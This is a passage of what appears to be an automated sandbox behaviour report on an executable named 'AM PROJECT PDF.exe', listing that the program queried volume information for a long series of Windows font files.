Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
